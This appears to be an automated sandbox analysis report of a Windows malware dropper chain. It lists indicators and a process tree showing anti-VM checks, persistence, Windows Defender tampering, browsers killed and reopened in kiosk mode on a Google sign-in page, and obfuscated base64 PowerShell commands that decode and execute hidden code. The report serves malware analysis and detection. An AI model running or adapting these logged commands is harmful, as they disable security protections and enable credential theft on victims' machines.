description pid Process Token: SeDebugPrivilege 856 7be4314deb.exe Token: SeDebugPrivilege 2372 taskkill.exe Token: SeDebugPrivilege 2664 taskkill.exe Token: SeDebugPrivilege 2460 taskkill.exe Token: SeDebugPrivilege 5004 taskkill.exe Token: SeDebugPrivilege 4004 taskkill.exe Token: SeDebugPrivilege 992 firefox.exe Token: SeDebugPrivilege 992 firefox.exe Token: SeDebugPrivilege 5996 0876cf74dd.exe Token: SeDebugPrivilege 6712 powershell.exe Token: SeDebugPrivilege 6996 powershell.exe Token: SeDebugPrivilege 3572 powershell.exe Token: SeDebugPrivilege 6456 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 6652 powershell.exe Token: SeDebugPrivilege 2292 powershell.exe Token: SeDebugPrivilege 4100 powershell.exe Token: SeIncreaseQuotaPrivilege 4100 powershell.exe Token: SeSecurityPrivilege 4100 powershell.exe Token: SeTakeOwnershipPrivilege 4100 powershell.exe Token: SeLoadDriverPrivilege 4100 powershell.exe Token: SeSystemProfilePrivilege 4100 powershell.exe Token: SeSystemtimePrivilege 4100 powershell.exe Token: SeProfSingleProcessPrivilege 4100 powershell.exe Token: SeIncBasePriorityPrivilege 4100 powershell.exe Token: SeCreatePagefilePrivilege 4100 powershell.exe Token: SeBackupPrivilege 4100 powershell.exe Token: SeRestorePrivilege 4100 powershell.exe Token: SeShutdownPrivilege 4100 powershell.exe Token: SeDebugPrivilege 4100 powershell.exe Token: SeSystemEnvironmentPrivilege 4100 powershell.exe Token: SeRemoteShutdownPrivilege 4100 powershell.exe Token: SeUndockPrivilege 4100 powershell.exe Token: SeManageVolumePrivilege 4100 powershell.exe Token: 33 4100 powershell.exe Token: 34 4100 powershell.exe Token: 35 4100 powershell.exe Token: 36 4100 powershell.exe Token: SeIncreaseQuotaPrivilege 4100 powershell.exe Token: SeSecurityPrivilege 4100 powershell.exe Token: SeTakeOwnershipPrivilege 4100 powershell.exe Token: SeLoadDriverPrivilege 4100 powershell.exe Token: SeSystemProfilePrivilege 4100 powershell.exe Token: SeSystemtimePrivilege 4100 powershell.exe Token: SeProfSingleProcessPrivilege 4100 powershell.exe Token: SeIncBasePriorityPrivilege 4100 powershell.exe Token: SeCreatePagefilePrivilege 4100 powershell.exe Token: SeBackupPrivilege 4100 powershell.exe Token: SeRestorePrivilege 4100 powershell.exe Token: SeShutdownPrivilege 4100 powershell.exe Token: SeDebugPrivilege 4100 powershell.exe Token: SeSystemEnvironmentPrivilege 4100 powershell.exe Token: SeRemoteShutdownPrivilege 4100 powershell.exe Token: SeUndockPrivilege 4100 powershell.exe Token: SeManageVolumePrivilege 4100 powershell.exe Token: 33 4100 powershell.exe Token: 34 4100 powershell.exe Token: 35 4100 powershell.exe Token: 36 4100 powershell.exe Token: SeIncreaseQuotaPrivilege 4100 powershell.exe Token: SeSecurityPrivilege 4100 powershell.exe Token: SeTakeOwnershipPrivilege 4100 powershell.exe Token: SeLoadDriverPrivilege 4100 powershell.exe Token: SeSystemProfilePrivilege 4100 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 5136 chrome.exe 4864 msedge.exe 4864 msedge.exe 4864 msedge.exe 4864 msedge.exe 4864 msedge.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 992 firefox.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe 4160 9dd5ebb048.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 992 firefox.exe 6604 HmngBpR.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 680 wrote to memory of 4992 680 3257a90914b6dfdb338969b2a58a260a.exe 83 PID 680 wrote to memory of 4992 680 3257a90914b6dfdb338969b2a58a260a.exe 83 PID 680 wrote to memory of 4992 680 3257a90914b6dfdb338969b2a58a260a.exe 83 PID 4992 wrote to memory of 1080 4992 A7B94.exe 85 PID 4992 wrote to memory of 1080 4992 A7B94.exe 85 PID 4992 wrote to memory of 1080 4992 A7B94.exe 85 PID 1080 wrote to memory of 4368 1080 1E08u3.exe 88 PID 1080 wrote to memory of 4368 1080 1E08u3.exe 88 PID 1080 wrote to memory of 4368 1080 1E08u3.exe 88 PID 4992 wrote to memory of 3132 4992 A7B94.exe 89 PID 4992 wrote to memory of 3132 4992 A7B94.exe 89 PID 4992 wrote to memory of 3132 4992 A7B94.exe 89 PID 3132 wrote to memory of 2460 3132 2R0700.exe 95 PID 3132 wrote to memory of 2460 3132 2R0700.exe 95 PID 3132 wrote to memory of 2460 3132 2R0700.exe 95 PID 680 wrote to memory of 776 680 3257a90914b6dfdb338969b2a58a260a.exe 96 PID 680 wrote to memory of 776 680 3257a90914b6dfdb338969b2a58a260a.exe 96 PID 680 wrote to memory of 776 680 3257a90914b6dfdb338969b2a58a260a.exe 96 PID 4368 wrote to memory of 2576 4368 rapes.exe 99 PID 4368 wrote to memory of 2576 4368 rapes.exe 99 PID 4368 wrote to memory of 2576 4368 rapes.exe 99 PID 4368 wrote to memory of 4836 4368 rapes.exe 100 PID 4368 wrote to memory of 4836 4368 rapes.exe 100 PID 4368 wrote to memory of 4836 4368 rapes.exe 100 PID 2576 wrote to memory of 4872 2576 a26361a646.exe 101 PID 2576 wrote to memory of 4872 2576 a26361a646.exe 101 PID 2576 wrote to memory of 4872 2576 a26361a646.exe 101 PID 2576 wrote to memory of 4872 2576 a26361a646.exe 101 PID 2576 wrote to memory of 4872 2576 a26361a646.exe 101 PID 2576 wrote to memory of 4872 2576 a26361a646.exe 101 PID 4368 wrote to memory of 3508 4368 rapes.exe 102 PID 4368 wrote to memory of 3508 4368 rapes.exe 102 PID 4368 wrote to memory of 3508 4368 rapes.exe 102 PID 2576 wrote to memory of 4872 2576 a26361a646.exe 101 PID 2576 wrote to memory of 4872 2576 a26361a646.exe 101 PID 2576 wrote to memory of 4872 2576 a26361a646.exe 101 PID 2576 wrote to memory of 4872 2576 a26361a646.exe 101 PID 4368 wrote to memory of 856 4368 rapes.exe 104 PID 4368 wrote to memory of 856 4368 rapes.exe 104 PID 4368 wrote to memory of 856 4368 rapes.exe 104 PID 4836 wrote to memory of 3512 4836 ebcf281f33.exe 105 PID 4836 wrote to memory of 3512 4836 ebcf281f33.exe 105 PID 4836 wrote to memory of 3512 4836 ebcf281f33.exe 105 PID 856 wrote to memory of 3452 856 7be4314deb.exe 106 PID 856 wrote to memory of 3452 856 7be4314deb.exe 106 PID 856 wrote to memory of 3452 856 7be4314deb.exe 106 PID 856 wrote to memory of 3452 856 7be4314deb.exe 106 PID 856 wrote to memory of 3452 856 7be4314deb.exe 106 PID 856 wrote to memory of 3452 856 7be4314deb.exe 106 PID 856 wrote to memory of 3452 856 7be4314deb.exe 106 PID 856 wrote to memory of 3452 856 7be4314deb.exe 106 PID 856 wrote to memory of 3452 856 7be4314deb.exe 106 PID 4836 wrote to memory of 3512 4836 ebcf281f33.exe 105 PID 4836 wrote to memory of 3512 4836 ebcf281f33.exe 105 PID 4836 wrote to memory of 3512 4836 ebcf281f33.exe 105 PID 4836 wrote to memory of 3512 4836 ebcf281f33.exe 105 PID 4836 wrote to memory of 3512 4836 ebcf281f33.exe 105 PID 4836 wrote to memory of 3512 4836 ebcf281f33.exe 105 PID 4836 wrote to memory of 3512 4836 ebcf281f33.exe 105 PID 4368 wrote to memory of 536 4368 rapes.exe 119 PID 4368 wrote to memory of 536 4368 rapes.exe 119 PID 4368 wrote to memory of 536 4368 rapes.exe 119 PID 4368 wrote to memory of 228 4368 rapes.exe 120 PID 4368 wrote to memory of 228 4368 rapes.exe 120 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\3257a90914b6dfdb338969b2a58a260a.exe"C:\Users\Admin\AppData\Local\Temp\3257a90914b6dfdb338969b2a58a260a.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\A7B94.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\A7B94.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1E08u3.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1E08u3.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Users\Admin\AppData\Local\Temp\10126610101\a26361a646.exe"C:\Users\Admin\AppData\Local\Temp\10126610101\a26361a646.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4872
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126620101\ebcf281f33.exe"C:\Users\Admin\AppData\Local\Temp\10126620101\ebcf281f33.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3512
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126630101\f2f8df5acc.exe"C:\Users\Admin\AppData\Local\Temp\10126630101\f2f8df5acc.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3508
-
-
C:\Users\Admin\AppData\Local\Temp\10126640101\7be4314deb.exe"C:\Users\Admin\AppData\Local\Temp\10126640101\7be4314deb.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Users\Admin\AppData\Local\Temp\10126640101\7be4314deb.exe"C:\Users\Admin\AppData\Local\Temp\10126640101\7be4314deb.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3452
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 9726⤵
- Program crash
PID:3044
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126650101\07a3928e11.exe"C:\Users\Admin\AppData\Local\Temp\10126650101\07a3928e11.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:536 -
C:\Users\Admin\AppData\Local\Temp\8CKO89S7RFEHT4LV2KHUEN5.exe"C:\Users\Admin\AppData\Local\Temp\8CKO89S7RFEHT4LV2KHUEN5.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1136
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126660101\f266eb5780.exe"C:\Users\Admin\AppData\Local\Temp\10126660101\f266eb5780.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:228
-
-
C:\Users\Admin\AppData\Local\Temp\10126670101\9dd5ebb048.exe"C:\Users\Admin\AppData\Local\Temp\10126670101\9dd5ebb048.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4160 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:4216
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:992 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 27276 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ea04936-7d02-47be-a5ca-5e8a25e972ad} 992 "\\.\pipe\gecko-crash-server-pipe.992" gpu8⤵PID:4964
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2476 -parentBuildID 20240401114208 -prefsHandle 2468 -prefMapHandle 2464 -prefsLen 28196 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0ad6503-ac51-4fec-b3d5-9bfbe6c9d56e} 992 "\\.\pipe\gecko-crash-server-pipe.992" socket8⤵PID:2804
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3116 -childID 1 -isForBrowser -prefsHandle 2876 -prefMapHandle 3156 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d5b7b62-f4ff-4e7f-93f6-994d602b1041} 992 "\\.\pipe\gecko-crash-server-pipe.992" tab8⤵PID:4220
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3708 -childID 2 -isForBrowser -prefsHandle 3700 -prefMapHandle 3696 -prefsLen 32686 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4c3d632b-4ce6-4c01-bb1b-e3835adf9ff8} 992 "\\.\pipe\gecko-crash-server-pipe.992" tab8⤵PID:4476
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4884 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4876 -prefMapHandle 4776 -prefsLen 32686 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {908de87b-9050-428e-8751-76fe08ace0b6} 992 "\\.\pipe\gecko-crash-server-pipe.992" utility8⤵
- Checks processor information in registry
PID:6928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -childID 3 -isForBrowser -prefsHandle 4736 -prefMapHandle 4732 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37e3119c-5aa7-453e-b292-24319f17915e} 992 "\\.\pipe\gecko-crash-server-pipe.992" tab8⤵PID:5568
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5480 -childID 4 -isForBrowser -prefsHandle 5632 -prefMapHandle 5636 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b1e2a7a-3959-4c27-a84a-b189cc88357a} 992 "\\.\pipe\gecko-crash-server-pipe.992" tab8⤵PID:5580
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5824 -childID 5 -isForBrowser -prefsHandle 5900 -prefMapHandle 5896 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {22634b4c-89d8-4704-ab6a-10a63fbd5ce1} 992 "\\.\pipe\gecko-crash-server-pipe.992" tab8⤵PID:5592
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126680101\0876cf74dd.exe"C:\Users\Admin\AppData\Local\Temp\10126680101\0876cf74dd.exe"5⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5996
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10126691121\skf7iF4.cmd"5⤵
- System Location Discovery: System Language Discovery
PID:6648 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\10126691121\skf7iF4.cmd' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6712 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10126691121\skf7iF4.cmd" sgcCUaUFtA7⤵
- System Location Discovery: System Language Discovery
PID:6948 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6996 -
C:\Windows\SysWOW64\findstr.exe"C:\Windows\system32\findstr.exe" /i WDS100T2B0A9⤵
- System Location Discovery: System Language Discovery
PID:4636
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126700101\PQkVDtx.exe"C:\Users\Admin\AppData\Local\Temp\10126700101\PQkVDtx.exe"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Enumerates system info in registry
PID:5528 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Program Files\runtime\COM Surrogate.exe"C:\Program Files\runtime\COM Surrogate.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6384 -
C:\Windows\system32\net.exe"net" session7⤵PID:4196
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session8⤵PID:4032
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -EncodedCommand JABpAGcAdQBsAHkAaAA9ACcATQBIAFoAOABYAGwAWQB2AFkARgBrAHYARABEADgAbQBQAEgAZAA0AFQARgBZADQAYwAxAG8AWQBkAHgARQA4AEIAaQB0AGcAVwBXADgAVwBTAFYANAB6AEIAMABRAFMAQgBpAGgASwBCADEAYwBXAFoAMQBnAGUAQQBRADAAZwBCAG4AWgAvAFUAWAA4ADQAQQBHAGsAWQBkAGsAUQBrAFAAQgBJAGIAWABYAHcARQBkADAAWQBnAEIAMABRAGUAQgBnAE4AcwBUADIAOABXAGEAMABFAFoASwBTAE0AbABQAEgAZAA3AFUAWABrAFUAWgB4AGsAagBkAGcAMQBoAEIAbgBkAEMAUQBGAGMAdABjADAAVQBlAEEAeABJADMATAB6AHgASwBjAG4AbwB0AFMAWABzAFoAZABpAE0AcABCAG4AUgBXAGQARwA4AEcAQQBGADAAWQBMAFIAWQArAEwAegB4AHYAUQBtAE0AcwBaADEAUQBqAEwAVABjAEQAQQBSAEkAYgBkAEYAWQA0AGMARgBrAHMAZABoAGsAbABQAHcASQBYAEIAVwBCAHkAWQB4AGcAWQBBAHkAQQAzAE4AZwBKAEMAWABXADgARwBaADEAZwA9ACcAOwAkAG4AZgBwAHYAawB1AD0AJwBlAEUALgA2ADUAQQAxAC0AegBEAHUAUAAnADsAJAB4AHEAbgB2AGkAcwA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABpAGcAdQBsAHkAaAApADsAJAB0AHYAYwBhAGYAYwBoAHUAPQAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAKABmAG8AcgAoACQAaQA9ADAAOwAkAGkAIAAtAGwAdAAgACQAeABxAG4AdgBpAHMALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAeABxAG4AdgBpAHMAWwAkAGkAXQAtAGIAeABvAHIAWwBiAHkAdABlAF0AJABuAGYAcAB2AGsAdQBbACQAaQAlACQAbgBmAHAAdgBrAHUALgBMAGUAbgBnAHQAaABdAH0AKQApACkAOwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdAB2AGMAYQBmAGMAaAB1ACkAKQB8AGkAZQB4AA==7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -EncodedCommand JABlAHIAZwBuAD0AJwBFAFUAQQAvAFUARABBAC8ARABrAEEAVQBEAEcAYwBZAEgAVQBFADcAUQBqAEEAbwBIAFUATQBqAGQAMABrAEMASgB4ADAAagBWAHcAawBHAEoAMABjAEkAQgB4AHcAcwBKAHgANABKAEMAVABFAEcAQwBVAEUAbABBAFYAVQBlAEoAMABBADgAWAB4AGsAbwBiAG4AQQBqAGQAaAB3AGEASABTAFIAWQBVAHgAbwBVAEcAVgA4AGIAQgB4AHcAZwBKAHoAVQB2AFEAUQBrAEcAQgBWAGcAaQBLAFgAcwBiAEgAVQBFADQAWAB4ADgARQBDAFEAQQBZAGQAbABWAGYASgAwAEUAQgBUAGoARQA5AEgAVgB3AGwAQQAwAG8ASgBEAGcAbwBKAGYAQgB3ADkASgAyAEkAaQBkAG4AcwBYAEoAMABJAFYAZQBnAGsAVwBiAGsAUQBqAEsARgBVAHMASgB6AHMAdgBmAFEAbwBKAEQAVgB3AFoAQQBWAFUAWQBIAFUARQByAFMAdwBzAFgASABWAHcAWQBkAGwAawBHAEgAawBFADcAUQBoAGsAbwBQAEYAbwBJAEIAeAB3ADUASABpAHMAbgBVAFIAbwBYAEYAUQBVAGoATAAyAHMAVQBEAFQAQgBjAFkARABJAEcAYQBsADgAagBkADAAawA2AEkARABzAEIAUwB3AGsAQwBIAFgAMABnAEUAMwA4AEYASABpAFIAWgBCAFEAPQA9ACcAOwAkAHEAbwBrAGwAZABwAD0AJwBEAHMAbQA4AFMAUQBfADQAQQBEAC0AbgAnADsAJAB1AGYAZABkAD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAcgBnAG4AKQA7ACQAbQBrAGkAawBiAHMAYQByAD0AKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkACgAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBs